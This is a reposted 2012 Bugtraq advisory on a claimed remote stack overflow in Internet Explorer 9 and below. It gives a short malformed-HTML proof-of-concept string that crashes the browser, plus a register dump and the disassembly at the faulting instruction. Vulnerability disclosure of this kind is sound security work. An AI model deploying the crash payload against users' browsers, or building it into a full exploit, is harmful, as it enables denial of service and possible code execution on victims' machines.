Nytro Posted December 20, 2012 Report Posted December 20, 2012 Microsoft Internet Explorer 9.x <= Remote Stack Overflow VulnerabilityFrom: pereira () secbiz deDate: Wed, 19 Dec 2012 15:40:46 GMT-----------------------------------------------------------------------Microsoft Internet Explorer 9.x <= Remote Stack Overflow Vulnerability-----------------------------------------------------------------------Author: Jean Pascal Pereira <pereira () secbiz de>Vendor: Microsoft Internet Explorer 9.x and belowDescription:The application is prone to a remote stack overflow vulnerability.Successful exploitation may lead to arbitrary code execution.----------------------------------------------------------------------Proof Of Concept:----------------------------------------------------------------------<table></for xmlns="1"><td><datetime><colgroup><id><dd><col></table><object><hr><base>----------------------------------------------------------------------Register Dump:----------------------------------------------------------------------EAX 800706BEECX 763FCDB3 RPCRT4.763FCDB3EDX 00000000EBX 0604393CESP 003FDDD4EBP 003FDDE0ESI 003FDE30EDI 761AFA10 ole32.761AFA10EIP 7629CF51 ole32.7629CF51----------------------------------------------------------------------Crash Instruction:----------------------------------------------------------------------7629CF36 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C]7629CF39 24 04 AND AL,47629CF3B 0FB6C0 MOVZX EAX,AL7629CF3E F7D8 NEG EAX7629CF40 1BC0 SBB EAX,EAX7629CF42 25 0A010180 AND EAX,8001010A7629CF47 8901 MOV DWORD PTR DS:[ECX],EAX7629CF49 8B45 E8 MOV EAX,DWORD PTR SS:[EBP-18]7629CF4C 50 PUSH EAX7629CF4D 53 PUSH EBX7629CF4E 8975 D8 MOV DWORD PTR SS:[EBP-28],ESI7629CF51 FF70 5C PUSH DWORD PTR DS:[EAX+5C]----------------------------------------------------------------------At 0x7629CF51, a read access violation occurs.----------------------------------------------------------------------Jean Pascal Pereira <pereira () secbiz de> || 0xffe4Copy: #627968 • KDE PastebinSursa: Bugtraq: Microsoft Internet Explorer 9.x <= Remote Stack Overflow Vulnerability Quote